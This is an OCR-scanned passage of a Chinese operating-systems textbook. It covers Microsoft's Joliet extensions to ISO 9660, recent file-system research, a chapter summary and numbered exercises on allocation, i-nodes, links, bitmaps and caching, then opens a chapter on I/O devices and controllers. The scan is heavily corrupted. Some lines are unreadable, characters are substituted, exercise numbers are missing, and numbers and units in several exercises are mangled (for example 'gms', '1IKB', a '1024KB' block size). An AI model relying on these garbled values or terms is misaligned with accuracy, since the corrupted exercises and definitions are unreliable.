UNIX 委 员 会 不 是 唯一 对 ISO 9660 进 行 扩展 的 小 组 ， 微 软 也 发 现 了 这 个 标准 有 太 多 的 限制 (尽管 这 
些 限 制 最 初 都 是 由 于 微软 自己 的 MS-DOS 引 起 的 ) 。 所 以 微软 也 做 了 一 些 名 为 Joliet 的 扩展 。 这 个 扩展 设 
计 的 目的 是 ， 为 了 能 够 将 Windows 文 件 系统 复制 到 CD-ROM 上 ， 并 且 能 够 恢复 (与 为 UNIX 设 计 Rock 
Ridge 的 思路 一 样 ) 。 实 际 上 所 有 能 在 Windows 上 运行 的 、 使 用 CD-ROM 的 程序 都 支持 Joliet， 包 括 可 写 
CD 的 刻录 程序 。 通 常 这 些 程序 都 让 用 户 选 择 是 使 用 ISO 9660 标 准 还 是 Joliet 标 准 。 

Joliet 提 供 的 主要 扩展 为 ， 

1) 长 文件 名 。 

2) Unicode 字 符 集 。 

3) ELS RAY A ae ERE. 

4) 带 扩 展 名 的 目录 。 

第 一 个 扩展 允许 文件 名 多 达 64 字 符 。 第 二 个 扩展 允许 文件 名 使 用 Unicode 字 符 集 ， 这 个 扩展 对 那些 
不 使 用 拉丁 字符 集 的 国家 非常 重要 ， 如 日 本 、 以 色 列 和 希腊 。 因 为 Unicode 字 符 是 2 个 字 节 的 ， 所 以 Joliet 
最 长 的 文件 名 可 以 达到 128 字 节 。 

和 Rock Ridge 一 样 ,Joliet 同 样 消 除了 对 目录 伏 套 深度 的 限制 。 目 录 可 以 根据 需要 达到 任意 嵌 套 深 
度 。 最 后 ， 目 录 名 也 可 以 有 扩展 名 。 目 前 还 不 清楚 为 什么 有 这 个 扩展 ， 因 为 大 多 数 的 Windows 目 录 从 来 
没有 扩展 名 ， 但 或 许 有 一 天 会 用 到 。 


4.6 有 关 文 件 系统 的 研究 

文件 系统 总 是 比 操作 系统 的 其 他 部 分 吸引 了 更 多 的 研究 ， 如 今 也 是 这 样 。FAST、MSST 和 NAS 这 些 
会 议 的 大 部 分 内 容 都 在 讨论 文件 和 存储 系统 。 在 标准 的 文件 系统 被 完全 理解 的 同时 ， 还 有 很 多 后 续 研 究 ， 
包括 备份 (Smaldone A, 2013; Wallace 等 人 ，2012)、 高 速 缓存 (Koller A; Oh，2012; Zhang 等 
人 ，2013a)、 安 全 删除 数据 (Wei 等 人 ，2012)、 文 件 压缩 (Harnik 等 人 ，2013)、Flash 文 件 系 统 (No, 
2012;，Park 和 Shen，2012，Narayanan，2009)、 性 能 (Leventhal, 2013; Schindler 等 人 ，2011)、RAID 
(Moon 和 Reddy，2013)、 可 靠 性 和 错误 恢复 (Chidambaram 等 人 ，2013; Ma 等 人 ,2013; McKusic, 
2012; Van Moolenbroek 等 人 ，2012)、 用 户 级 文件 系统 (Rajgarhia 和 Gehani，2010) 、 一 致 性 验证 
(Fryer 等 人 ，2012) 和 版 本 文件 系统 (Mashtizadeh 等 人 ，2013) 。 只 检测 文件 系统 内 部 情况 也 是 一 个 研 
究 课 题 (Harter 等 人 ，2012 ) 。 

安全 是 个 永久 的 课题 (Botelho 等 人 ，2013，Li 等 人 ，2013c;，Lorch 等 人 ，2013) 。 相 比 之 下 ， 一 个 很 
热 的 新 课题 是 云 文件 系统 (Mazurek 等 人 ，2012，YVrable 等 人 ，2012) 。 另 一 个 最 近 受 到 关注 的 领域 是 起 源 
(provenance) 一 一 追溯 数据 的 历史 ， 包 括 它们 自 哪里 来 ， 谁 拥有 它们 ， 以 及 它们 是 如 何 转换 的 (Ghoshal 
和 Plale，2013，Sultana 和 Bertino，2013) 。 在 法 律 的 驱使 下 ， 公 司 对 保证 数据 安全 和 长 期 可 用 也 非常 感 兴 
趣 (Baker 等 人 ，2006)。 最 后 ， 其 他 研究 者 也 在 重新 思考 文件 系统 堆栈 (Appuswamy 等 人 ，2011) 。 


4.7 小 结 

从 外 部 看 ， 文 件 系统 是 一 组 文件 和 目录 ， 以 及 对 文件 和 目录 的 操作 。 文 件 可 以 被 读 写 ， 目 录 可 以 被 
创建 和 删除 ， 并 可 将 文件 从 一 个 目录 移 到 另 一 个 目录 中 。 大 多 数 现 代 操作 系统 都 支持 层次 目录 系统 ， 其 
中 ， 目 录 中 还 有 子 目录 ， 子 目录 中 还 可 以 有 子 目 录 ， 如 此 无 限 下 去 。 

而 在 内 部 看 ， 文 件 系统 又 是 另 一 番 景 象 。 文 件 系统 的 设计 者 必须 考虑 存储 区 是 如 何 分 配 的 ， 系 统 如 


186 


4# 


何 记录 哪个 块 分 给 了 哪个 文件 。 可 能 的 方案 有 连续 文件 、 链 表 、 文 件 分 配 表 和 i 节点 等 。 不 同 的 系统 有 
不 同 的 目录 结构 。 属 性 可 以 存在 目录 中 或 存在 别处 (比如 ， 在 i 节点 中 )。 磁 盘 空 间 可 以 通过 位 图 的 空闲 
表 来 管理 。 通 过 增 量 转 储 以 及 用 程序 修复 故障 文件 系统 的 方法 ， 可 以 提高 文件 系统 的 可 靠 性 。 文 件 系统 
的 性 能 非常 重要 ， 可 以 通过 多 种 途径 提高 性 能 ， 包 括 高 速 缓存 、 预 读 取 以 及 尽 可 能 仔细 地 将 一 个 文件 中 
的 块 紧密 地 放置 在 一 起 等 方法 。 日 志 结构 文件 系统 通过 大 块 单元 写 入 的 操作 也 可 以 改善 性 能 。 

文件 系统 的 例子 有 ISO 9660、MS-DOS 以 及 UNIX。 它 们 之 间 在 怎样 记录 每 个 文件 所 使 用 的 块 、 目 


录 结 构 以 及 对 空闲 磁盘 空间 管理 等 方面 都 存在 着 差别 。 
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.给 出 文件 /etc/passwd 的 五 种 不 同 的 路 径 名 。( 提 


P: 考虑 目录 项 “.” 和 “..”。) 


:在 Windows 中 ， 当 用 户 双击 资源 管理 器 中 列 出 


的 一 个 文件 时 ， 就 会 运行 一 个 程序 ， 并 以 这 个 
文件 作为 参数 。 操 作 系 统 需 要 知道 运行 的 是 哪 
个 程序 ， 请 给 出 两 种 不 同 的 方法 。 


.在 早期 的 UNIX 系 统 中 , 可 执行 文件 (a.out 文 件 ) 


以 一 个 特定 的 魔 数 (magic number) 而 不 是 一 
个 随机 选取 的 数字 开头 。 这 些 文件 的 开头 是 
header， 随 后 是 文本 段 和 数据 段 。 为 什么 可 执 
行文 件 要 选取 一 个 特定 的 数字 ， 而 其 他 类 型 的 
文件 会 多 少 有 些 随机 地 选择 魔 数 开头 ? 


.在 UNIX 中 open 系 统 调 用 绝对 需要 吗 ? 如 果 没 


会 产生 什么 结果 ? 


. 在 支持 顺序 文件 的 系统 中 总 有 一 个 文件 回 绕 操 作 ， 


支持 随机 存 取 文 件 的 系统 是 否 也 需要 该 操作 ? 


. 某 一 些 操作 系统 提供 系统 调用 rename 给 文件 重 


命名 ， 同 样 也 可 以 通过 把 文件 复制 到 新 文件 并 
删除 原文 件 而 实现 文件 重 命名 。 请 问 这 两 种 方 
法 有 何不 同 ? 


:在 有 些 系 统 中 有 可 能 把 部 分 文件 映射 进 内 存 中 。 


如 此 一 来 系统 应 该 施加 什么 限制 ? 这 种 部 分 映 
射 如 何 实 现 ? 


. 有 一 个 简单 操作 系统 只 支持 单一 目录 结构 ， 但 


是 允许 该 目录 中 有 任意 多 个 文件 ， 且 带 有 任意 
长 度 的 名 字 。 这 样 可 以 模拟 层次 文件 系统 吗 ? 
如 何 进行 ? 


.在 UNIX 和 Windows 中 ， 通 过 使 用 一 个 特殊 的 系 


统 调用 把 文件 的 “当前 位 置 ”指针 移 到 指定 字 
节 ， 从 而 实现 了 随机 访问 。 请 提出 一 个 不 使 用 
该 系统 调用 完成 随机 存 取 的 替代 方案 。 


10. 考虑 图 4-8 中 的 目录 树 ， 如 果 当 前 工作 目录 是 


/usr/jim， 则 相对 路 径 名 为 ../ast/x 的 文件 的 绝对 
路 径 名 是 什么 ? 


11. 正如 书 中 所 提 到 的 ， 文 件 的 连续 分 配 会 导致 磁 


盘 碎片 ， 因 为 当 一 个 文件 的 长 度 不 等 于 块 的 整 
数 倍 时 ， 文 件 中 的 最 后 一 个 磁盘 块 中 的 空间 会 
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20. 


浪费 掉 。 请 问 这 是 内 碎片 还 是 外 碎片 ? 并 将 它 
与 先前 一 章 的 有 关 讨论 进行 比较 。 


.描述 一 个 损坏 的 数据 块 对 以 下 三 种 形式 的 文 


件 的 影响 : (a) 连续 的 ，(b) 链表 的 ，(c) 
索引 的 。 


:一 种 在 磁盘 上 连续 分 配 并 且 可 以 避免 空洞 的 方 


案 是 ， 每 次 删除 一 个 文件 后 就 紧缩 一 下 磁盘 。 
由 于 所 有 的 文件 都 是 连续 的 ， 复 制 文件 时 需要 
寻 道 和 旋转 延迟 以 便 读 取 文 件 , 然后 全 速 传送 。 
在 写 回 文件 时 要 做 同样 的 工作 。 假 设 寻 道 时间 
为 5ms， 旋 转 延迟 为 4 ms， 传 送 速 率 为 8MB/s， 
而 文件 平均 长 度 是 8 KB ， 把 一 个 文件 读 入 内 
存 并 写 回 到 磁盘 上 的 一 个 新 位 置 需 要 多 长 时 
间 ? 运用 这 些 数字 ,计算 紧缩 16GB 磁 盘 的 一 
半 需 要 多 长 时 间 ? 


. 基于 前 一 个 问题 的 答案 ， 紧 缩 磁盘 有 什么 作用 吗 ? 
15. 


某 些 数字 消费 设备 需要 存储 数据 ， 比 如 存放 文 
件 等 。 给 出 一 个 现代 设备 的 名 字 ， 该 设备 需要 
文件 存储 ， 并 且 适 合 连续 的 空间 分 配 。 


.考虑 图 4-13 中 的 i 节 点 。 如 果 它 含有 用 4 个 字 节 


表示 的 10 个 直接 地 址 ， 而 且 所 有 的 磁盘 块 大 小 
是 1024KB ， 那 么 文件 最 大 可 能 有 多 大 ? 


.一 个 班 的 学 生 信息 存储 在 一 个 文件 中 ， 这 些 记 


录 可 以 被 随意 访问 和 更 新 。 假 设 每 个 学 生 的 记 
录 大 小 都 相同 ， 那 么 在 连续 的 、 链 表 的 和 表格 / 
索引 的 这 三 种 分 配方 式 中 ， 哪 种 方式 最 合适 ? 
考虑 一 个 大 小 始终 在 4KB 和 4MB 之 间 变 化 的 文 
件 ， 连 续 的、 链表 的 和 表格 /索引 的 这 三 种 分 
配方 式 中 ， 哪 个 方式 最 合适 ? 


.有 建议 说 ， 把 短文 件 的 数据 存在 i 节 点 内 会 提 


高 效率 并 且 节 省 磁盘 空间 。 对 于 图 4-13 中 的 i 
节点 ， 在 i 节点 内 可 以 存放 多 少 字 节 的 数据 ? 

两 个 计算 机 科学 系 的 学 生 Carolyn 和 Elinor 正 在 
讨论 i 节 点 。Carolyn 认 为 存储 器 容量 越 来 越 大 ， 
价格 越 来 越 便宜 ， 所 以 当 打 开 文 件 时 ， 直 接 取 
i 节 点 的 副本 ， 放 到 内 存 i 节 点 表 中 ， 建 立 一 个 
新 i 节点 将 更 简单 、 更 快 ， 没 有 必要 搜索 整个 i 
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节点 来 判断 它 是 否 已 经 存在 。Elinor 则 不 同意 
这 一 观点 。 他 们 两 个 人 谁 对 ? 

21. 说 明 硬 链接 优 于 符号 链接 的 一 个 优点 ， 并 说 明 

符号 链接 优 于 硬 链接 的 一 个 优点 。 

.分 别 阐释 硬 链接 和 软 链 接 与 i 节 点 分 配方 式 的 

区 别 。 

23. 考虑 一 个 块 大 小 为 4 KB 、 使 用 自由 列表 (free- 
list method) 的 4TB 的 磁盘 ， 多 少 个 块 地 址 可 
以 被 存 进 一 个 块 中 ? 

24. 空闲 磁盘 空间 可 用 空闲 块 表 或 位 图 来 跟踪 。 假 

设 磁盘 地 址 需要 忆 位 ， 一 个 磁盘 有 B 个 块 ， 其 

中 有 F 个 空间 。 在 什么 条 件 下 ， 空 闪 块 表 采 用 

的 空间 少 于 位 图 ? 设 D 为 16 位 ， 请 计算 空闲 磁 

盘 空 间 的 百分比 。 

.一 个 空闲 块 位 图 开始 时 和 磁盘 分 区 首次 初始 化 

类 似 ， 比 如 : 1000 0000 0000 0000 (HRB 

根 目 录 使 用 ) ， 系 统 总 是 从 最 小 编号 的 盘 块 开 

始 寻 找 空 闪 块 ， 所 以 在 有 6 块 的 文件 A 写 入 之 

后 ， 该 位 图 为 1111 1110 0000 0000。 请 说 明 在 

完成 如 下 每 一 个 附加 动作 之 后 位 图 的 状态 : 

(a) 写 入 有 5 块 的 文件 B。 

(b) 删除 文件 A。 

(c) 写 入 有 8 块 的 文件 C。 

(d) 删除 文件 B。 

26. 如 果 因 为 系统 崩溃 而 使 存放 空 闪 磁盘 块 信息 的 
空闲 块 表 或 位 图 完全 丢失 ， 会 发 生 什么 情况 ? 
有 什么 办 法 从 这 个 灾难 中 恢复 吗 ， 还 是 该 磁盘 
彻底 无 法 使 用 ? 分 别 就 UNIX 和 FAT-16 文 件 系 
统 讨 论 你 的 答案 。 

，27. Oliver Owl 在 大 学 计算 中 心 的 工作 是 更 换 用 于 
通宵 数据 备份 的 磁带 ， 在 等 待 每 盘 磁带 完成 的 
同时 ， 他 在 写 一 篇 毕业 论文 ,证明 莎士比亚 戏 
剧 是 由 外 星 访客 写成 的 。 由 于 仅 有 一 个 系统 ， 
所 以 只 能 在 正在 做 备份 的 系统 上 运行 文本 编辑 
程序 。 这 样 的 安排 有 什么 问题 吗 ? 

28. 在 教材 中 我 们 详细 讨论 过 增 量 转 储 。 在 
Windows 中 很 容易 说 明 何 时 要 转 储 一 个 文件 ， 
因为 每 个 文件 都 有 一 个 存档 位 。 在 UNIX 中 没 
有 这 个 位 ， 那 么 UNIX 备 份 程序 怎样 知道 哪个 
文件 需要 转 储 ? 

29, 假设 图 4-25 中 的 文件 21 自 上 次 转 储 之 后 没有 修改 
过 ,在 什么 情况 下 图 4-26 中 的 四 张 位 图 会 不 同 ? 

30. 有 人 建议 每 个 UNIX 文 件 的 第 一 部 分 最 好 和 其 i 节 
点 放 在 同一 个 磁盘 块 中 ， 这 样 做 有 什么 好 处 ? 

31. 考虑 图 4-27。 对 某 个 特殊 的 块 号 ,计数器 的 值 
在 两 个 表 中 有 没有 可 能 都 是 数值 2? 这 个 问题 


2 
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如 何 纠 正 ? 

32. 文件 系统 的 性 能 与 高 速 缓存 的 命中 率 有 很 大 的 

关系 〈 即 在 高 速 缓存 中 找到 所 需 块 的 概率 ) 。 

从 高 速 缓存 中 读 取 数 据 需要 lms， 而 从 磁盘 上 

读 取 需要 40ms ， 若 命中 率 为 ?， 给 出 读 取 数据 

所 需 平 均 时 间 的 计算 公式 。 并 画 出 h 从 0 到 1.0 

变化 时 的 函数 曲线 。 

. 对 于 与 计算 机 相连 接 的 一 个 外 部 USB 硬 盘 驱 动 器 ， 

通 写 高 速 缓存 和 块 高 速 缓存 哪 种 方式 更 合适 ? 

34. 考虑 一 个 将 学 生 记 录 存 放 在 文件 中 的 应 用 ， 它 
以 学 生 ID 作 为 输入 ， 随 后 读 入 、 更 新 和 写 相 应 
的 学 生 记录 。 这 个 过 程 重复 进行 直到 应 用 结束 。 
块 预 读 (block read-ahead) 技术 在 这 里 适用 吗 ? 

35. 考虑 一 个 有 10 个 数据 块 的 磁盘 ， 这 些 数 据 块 从 
块 14 到 23。 有 两 个 文件 在 这 个 磁盘 上 : fl1 和 f2。 
这 个 目录 结构 显示 fl1 和 人 的 第 一 个 数据 块 分 别 
为 22 和 16。 给 定 FAT 表 项 如 下 ， 哪 些 数 据 块 被 
分 配给 f1 和 f2? 

(14,18); (15,17); (16,23); (17,21); (18,20); 
(19,15); (20,—1); (21,—1); (22,19); (23,14) 

在 上 面 的 符号 中 ，(x, y) 表 示 存 储 在 表 项 x 中 的 
值 指向 数据 块 y。 

36. 考虑 图 4-21 背 后 的 思想 ， 目 前 磁盘 平均 寻 道 

时 间 为 gms， 旋 转速 率 为 15 000rpm， 每 道 为 

262 144 字 节 。 对 大 小 各 为 IKB、2KB 和 4KB 

的 磁盘 块 ， 传 送 速率 各 是 多 少 ? 

. 某 个 文件 系统 使 用 2KB 的 磁盘 块 ， 而 中 间 文 件 

大 小 值 为 1IKB。 如 果 所 有 的 文件 都 是 正好 1KB 

大 ， 那 么 浪费 掉 的 磁盘 空间 的 比例 是 多 少 ? 你 

认为 一 个 真正 的 文件 系统 所 浪费 的 空间 比 这 个 

数值 大 还 是 小 ? 请 说 明理 由 。 

38. 给 定 磁盘 块 大 小 为 4KB， 块 指针 地 址 值 为 4 字 
节 ， 使 用 10 个 直接 地 址 (direct address) 和 一 
个 间接 块 (indirect block) 可 以 访问 的 最 大 文 
件 大 小 是 多 少 字 节 ? 

39. MS-DOS 中 的 文件 必须 在 内 存 中 的 FAT-16 表 中 
竞争 空间 。 如 果菜 个 文件 使 用 了 k 个 表 项 ， 共 
他 任何 文件 就 不 能 使 用 这 k 个 表 项 ， 这 样 会 对 
所 有 文件 的 总 长 度 带 来 什么 限制 ? 

40. 一 个 UNIX 系 统 使 用 4KB 磁 盘 块 和 4 字 节 磁盘 地 

址 。 如 果 每 个 i 节点 中 有 10 个 直接 表 项 以 及 一 

个 一 次 间接 块 、 一 个 二 次 间接 块 和 一 个 三 次 间 

接 块 ， 那 么 文件 最 大 为 多 大 ? 

. 对 于 文件 /usr/ast/courses/os/handout.t， 若 要 获 

取 其 i 节点 需要 多 少 个 磁盘 操作 ? 假设 其 根 目 

录 的 i 节 点 在 内 存 中 ， 其 他 路 径 都 不 在 内 存 中 。 
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并 假设 所 有 的 目录 都 在 一 个 磁盘 块 中 。 

在 许多 UNIX 系 统 中 ,i 节点 存放 在 磁盘 的 开始 
处 。 一 种 替代 设计 方案 是 ， 在 文件 创建 时 分 配 
ji 节点， 并 把 i 节 点 存放 在 该 文件 首 个 磁盘 块 的 
开始 处 。 请 讨论 这 个 方案 的 优 缺 点 。 

编写 一 个 将 文件 字 节 倒 写 的 程序 ， 这 样 最 后 一 
个 字 节 成 为 第 一 个 字 节 ， 而 第 一 个 字 节 成 为 最 
后 一 个 字 节 。 程 序 必须 适合 任何 长 度 的 文件 ， 
并 保持 适当 的 效率 。 

编写 一 个 程序 ， 该 程序 从 给 定 的 目录 开始 ， 从 
此 点 开始 沿 目录 树 向 下 ， 记 录 所 找到 的 所 有 文 
件 的 大 小 。 在 完成 这 一 切 之 后 ， 该 程序 应 该 打 
印 出 文件 大 小 分 布 的 直方 图 ， 以 该 直方 图 的 区 
间 宽 度 为 参数 (比如 ， 区 间 宽 度 为 1024， 那 么 
大 小 为 0~1023 的 文件 同 在 一 个 区 间 宽 度 ， 大 小 
为 1024~2047 的 文件 同 在 下 一 个 区 间 宽 度 ， 如 
此 类 推 ) 。 

编写 一 个 程序 ， 扫 描 UNIX 文 件 系 统 中 的 所 有 
目录 ， 并 发 现 和 定位 有 两 个 或 更 多 硬 链接 计数 
的 节点。 对 于 每 个 这 样 的 文件 ， 列 出 指向 该 
文件 的 所 有 文件 的 名 称 。 


hae 


46. 编写 UNIX 的 新 版 1s 程 序 。 这 个 版 本 将 一 个 或 
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多 个 目录 名 作为 变量 ， 并 列 出 每 个 目录 中 所 有 
的 文件 ， 一 个 文件 一 行 。 每 个 域 应 该 对 其 类 型 
进行 合理 的 格式 化 。 仅 列 出 第 一 个 磁盘 地 址 
( 若 该 地 址 存在 的 话 ) 。 

实现 一 个 程序 ， 测 量 应 用 层 缓冲 区 的 大 小 对 读 
取 时 间 造 成 的 影响 。 这 包括 对 一 个 很 大 的 文件 
(比如 2GB) 进行 写 和 读 操 作 。 改 变 应 用 缓冲 
区 大 小 (如 从 64B 到 4KB)， 用 定时 测量 程序 
(如 UNIX 上 的 gettimeofday 和 getitimer) 来 测 
量 不 同 大 小 的 缓冲 区 需要 的 时 间 。 评 估 结 果 并 
报告 你 的 发 现 : 缓冲 区 的 大 小 会 对 整个 写 入 时 
间 和 每 次 写 人 时 间 造 成 影响 吗 ? 


. 实现 一 个 模拟 的 文件 系统 ， 它 被 整个 存储 在 磁 


盘 上 一 个 普通 文件 中 。 这 个 磁盘 文件 会 包含 目 
录 、i 市 点 、 空 闪 块 信息 和 文件 数据 块 等 。 选 
择 合适 的 算法 来 维护 空闲 块 信息 和 分 配 数据 块 
(连续 的 ， 索 引 的 ， 链 表 的 ) 。 你 的 程序 会 接受 
来 自用 户 的 系统 命令 ， 从 而 创建 、 删 除 目录 ， 
创建 、 删 除 、 打 开 文 件 ， 读 取 、 写 入 一 个 指定 
文件 ， 列 出 目录 的 内 容 。 
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除了 提供 抽象 (例如 ， 进程、 地址 空间 和 文件 ) 以 外 ,操作 系统 还 要 控制 计算 机 的 所 有 LO (输入 /输出 ) 
设备 。 操 作 系 统 必须 向 设备 发 送 命令 ， 捕 捉 中 断 ， 并 处 理 设备 的 各 种 错误 。 它 还 应 该 在 设备 和 系统 的 其 他 
部 分 之 间 提 供 简 单 且 易于 使 用 的 接口 。 如 果 有 可 能 ， 这 个 接口 对 于 所 有 设备 都 应 该 是 相同 的 ， 这 就 是 所 谓 
的 设备 无 关 性 。IO 部 分 的 代码 是 整个 操作 系统 的 重要 组 成 部 分 。 操 作 系统 如 何 管理 IO 是 本 章 的 主题 。 

本 章 的 内 容 是 这 样 组 织 的 : 首先 介绍 IO 硬件 的 基本 原理 ， 然 后 介绍 一 般 的 IO 软件 。LIO 软 件 可 以 分 
层 构造 ， 每 层 都 有 明确 的 任务 。 我 们 将 对 这 些 软件 层 进 行 研究 ， 看 一 看 它们 做 些 什么 ， 以 及 如 何在 一 起 
配合 工作 。 

接 下 来 将 详细 介绍 几 种 IO 设备 : 磁盘 、 时 钟 、 键 盘 和 显示 器 。 对 于 每 一 种 设备 我 们 都 将 从 硬件 和 
软件 两 方面 加 以 介绍 。 最 后 ， 我 们 还 将 介绍 电源 管理 。 


5.1 IO 硬件 原理 

不 同 的 人 对 于 IO 硬件 的 理解 是 不 同 的 。 对 于 电子 工程 师 而 言 ，IO 硬 件 就 是 芯片 、 导 线 、 电 源 、 电 
机 和 其 他 组 成 硬件 的 物理 部 件 。 对 程序 员 而 言 ， 则 只 注意 IO 硬件 提供 给 软件 的 接口 ， 如 硬件 能 够 接收 
的 命令 、 它 能 够 实现 的 功能 以 及 它 能 够 报告 的 错误 。 本 书 主要 介绍 怎样 对 IO 设备 编程 ， 而 不 是 如 何 设 
计 、 制 造 和 维护 硬件 ， 因 此 ， 我 们 的 讨论 限于 如 何 对 硬件 编程 ， 而 不 是 其 内 部 的 工作 原理 。 然 而 ， 很 多 
IO 设备 的 编程 常常 与 其 内 部 操作 密切 相关 。 在 下 面 三 节 中 ， 我 们 将 介绍 与 IO 硬件 编程 有 关 的 一 般 性 背 
景 知识 。 这 些 内 容 可 以 看 成 是 对 1.4 节 介绍 性 材料 的 复习 和 扩充 。 
5.1.1 VOR% 

IO 设备 大 致 可 以 分 为 两 类 : 块 设备 (block device) 和 字符 设备 (character device)。 块 设备 把 信息 
存储 在 固定 大 小 的 块 中 ， 每 个 块 有 自己 的 地 址 。 通 常 块 的 大 小 在 512 字 节 至 65 536 字 节 之 间 。 所 有 传输 


以 一 个 或 多 个 完整 的 〈 连 续 的 ) 块 为 单位 。 块 设备 的 | 设备 | 数据 率 | 






基本 特征 是 每 个 块 都 能 独立 于 其 他 块 而 读 写 。 硬 盘 、 
SLA AUSBAARE RARE. 
如 果 仔 细 观 察 ， 块 可 寻 址 的 设备 与 其 他 设备 之 间 
并 没有 严格 的 界限 。 磁 盘 是 公认 的 块 可 寻 址 的 设备 ， 
因为 无 论 磁盘 臂 当 前 处 于 什么 位 置 ， 它 总 是 能 够 寻 址 
其 他 柱 面 并 且 等 待 所 需要 的 磁盘 块 旋转 到 磁头 下 面 。 
现在 考虑 虽然 过 时 但 仍 在 使 用 的 磁带 机 ， 有 时 使 用 它 
对 磁盘 进行 备份 (因为 磁带 很 便宜 ) 。 磁 带 包 含 按 顺 序 
排列 的 块 。 如 果 给 出 命令 让 磁带 机 读 取 第 N 块 ， 它 可 以 
首先 向 回 倒 带 ， 然 后 再 前 进 直到 第 N 块 。 该 操作 与 磁盘 
的 寻 道 相 类 似 ， 只 是 花费 的 时 间 更 长 。 不 过 ， 重 写 磁 
。 带 中 间 位 置 的 块 有 可 能 做 得 到 ， 也 有 可 能 做 不 到 。 即 
便 有 可 能 把 磁带 当 作 随 机 访问 的 块 设备 来 使 用 ， 也 是 
有 些 勉 为 其 难 的 ， 毕 竞 通常 并 不 这 样 使 用 磁带 。 
另 一 类 IO 设备 是 字符 设备 。 字 符 设备 以 字符 为 音 
位 发 送 或 接收 一 个 字符 流 ， 而 不 考虑 任何 块 结构 。 字 


符 设备 是 不 可 寻 址 的 ， 也 没有 任何 寻 道 操作 。 打 印 机 、 
网 络 接口 、 鼠 标 (用 作 指 点 设备 )、 老 鼠 (用 作 心 理学 
























图 5-1 某 些 典型 的 设备 、 网 络 和 总 线 的 数据 率 
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实验 室 实 验 ) ， 以 及 大 多 数 与 磁盘 不 同 的 设备 都 可 看 作 字 符 设备 。 

这 种 分 类 方法 并 不 完美 ， 有 些 设备 就 没有 包括 进去 。 例 如 ， 时 钟 既 不 是 块 可 寻 址 的 ， 也 不 产生 或 接 
收 字 符 流 。 它 所 做 的 工作 就 是 按照 预先 规定 好 的 时 间 间 隔 产生 中 断 。 内 存 映射 的 显示 器 也 不 适用 于 此 模 
型 。 但 是 ， 块 设备 和 字符 设备 的 模型 具有 足够 的 一 般 性 ， 可 以 用 作 使 处 理 IO 设 备 的 某 些 操作 系统 软件 具 
有 设备 无 关 性 的 基础 。 例 如 ， 文 件 系统 只 处 理 抽 象 的 块 设备 ， 而 把 与 设备 相关 的 部 分 留 给 较 低 层 的 软件 。 

IO 设备 在 速度 上 覆盖 了 巨大 的 范围 ， 要 使 软件 在 跨越 这 么 多 数量 级 的 数据 率 下 保证 性 能 优良 ， 给 
软件 造成 了 相当 大 的 压力 。 图 5-1 列 出 了 某 些 常见 设备 的 数据 率 ， 这 些 设备 中 大 多 数 随 着 时 间 的 推移 而 
变 得 越 来 越 快 。 

.5.1.2 设备 控制 器 

IO 设备 一 般 由 机 械 部 件 和 电子 部 件 两 部 分 组 成 。 通 常 可 以 将 这 两 部 分 分 开 处 理 ， 以 提供 更 加 模块 
化 和 更 加 通用 的 设计 。 电 子 部 件 称 作 设备 控制 器 (device controller) 或 适配器 (adapter)。 在 个 人 计算 
机 上 ， 它 经 常 以 主板 上 的 芯片 的 形式 出 现 ， 或 者 以 插入 (PCI) 扩展 槽 中 的 印刷 电路 板 的 形式 出 现 。 机 
械 部 件 则 是 设备 本 身 。 这 一 安排 如 图 1-6 所 示 。 

控制 器 卡 上 通常 有 一 个 连接 器 ， 通 向 设备 本 身 的 电缆 可 以 插入 到 这 个 连接 器 中 。 很 多 控制 器 可 以 操 
作 2 个 、4 个 甚至 8 个 相同 的 设备 。 如 果 控 制 器 和 设备 之 间 采 用 的 是 标准 接口 ， 无 论 是 官方 的 ANSI、IEEE 
或 ISO 标准 还 是 事实 上 的 标准 ， 各 个 公司 都 可 以 制造 各 种 适合 这 个 接口 的 控制 器 或 设备 。 例 如 ， 许 多 公 
司 都 生产 符合 SATA、SCSI、USB 、Thunderbolt (雷电 ) 或 火线 (IEEE 1394) 接口 的 磁盘 驱动 器 。 

控制 器 与 设备 之 间 的 接口 通常 是 一 个 很 低层 次 的 接口 。 例 如 , 磁盘 可 以 按 每 个 磁道 2 000 000 个 扇 区 ， 
每 个 扇 区 512 字 节 进 行 格式 化 。 然 而 ， 实 际 从 驱动 器 出 来 的 却 是 一 个 串 行 的 位 (比特 ) 流 ， 它 以 一 个 前 
导 符 (preamble) 开始 ， 接 着 是 一 个 扇 区 中 的 4096 位 ， 最 后 是 一 个 校 验 和 ， 也 称 为 错误 校正 码 (Error- 
Correcting Code，ECC) 。 前 导 符 是 在 对 磁盘 进行 格式 化 时 写 上 去 的 ， 它 包括 柱 面 数 和 扇 区 号 、 扇 区 大 
小 以 及 类 似 的 数据 ， 此 外 还 包含 同步 信息 。 

控制 器 的 任务 是 把 串 行 的 位 流转 换 为 字 节 块 ， 并 进行 必要 的 错误 校正 工作 。 字 节 块 通常 首先 在 控制 器 内 
部 的 一 个 缓冲 区 中 按 位 进行 组 装 ， 然 后 再 对 校 验 和 进行 校 验 并 证 明 字 节 块 没有 错误 后 ， 再 将 它 复制 到 主 存 中 。 

在 同样 低 的 层次 上 ，LCD 显 示 器 的 控制 器 也 是 一 个 位 串 行 设备 。 它 从 内 存 中 读 入 包含 待 显 示 字 符 的 
字 节 ， 产 生 信号 以 便 使 相应 的 像素 改变 背光 的 极 化 方式 ， 从 而 将 其 写 到 屏幕 上 。 如 果 没 有 显示 器 控制 器 ， 
那么 操作 系统 程序 员 只 能 对 所 有 像素 的 电场 显 式 地 进行 编程 。 有 了 控制 器 ， 操 作 系 统 就 可 以 用 几 个 参数 对 
控制 器 进行 初始 化 ， 这 些 参 数 包括 每 行 的 字符 数 或 像素 数 以 及 每 屏 的 行 数 等 ， 并 让 控制 器 实际 驱动 电场 。 

在 很 短 的 时 间 里 ，LCD 屏 幕 已 经 完全 取代 了 老式 的 CRT (Cathode Ray Tube， 阴 极 射线 管 ) 监视 器 。 
CRT 监 视 器 发 射电 子 束 到 荧光 屏 上 。 利 用 磁场 ， 系 统 能 够 使 电子 束 弯曲 并 且 在 屏幕 上 画 出 像素 。 与 LCD 
屏幕 相 比 ，CRT 监 视 器 笨重 、 费 电 并 且 易 碎 。 此 外 ， 在 今天 的 (视网膜 ) LCD 屏 幕 上 ， 分 辩 率 已 经 好 到 
人 眼 不 能 区 分 单个 像素 的 程度 。 今 天 已 经 很 难 想象 ， 过 去 的 笔记 本 电脑 带 有 小 的 CRT 屏 幕 ， 有 20cm 厚 ， 
重 达 12kg， 很 适合 健身 。 

5.1.3 ”内存 映射 /O 

每 个 控制 器 有 几 个 寄存 器 用 来 与 CPU 进 行 通信 。 通 过 写 入 这 些 寄存 器 ， 操 作 系 统 可 以 命令 设备 发 送 
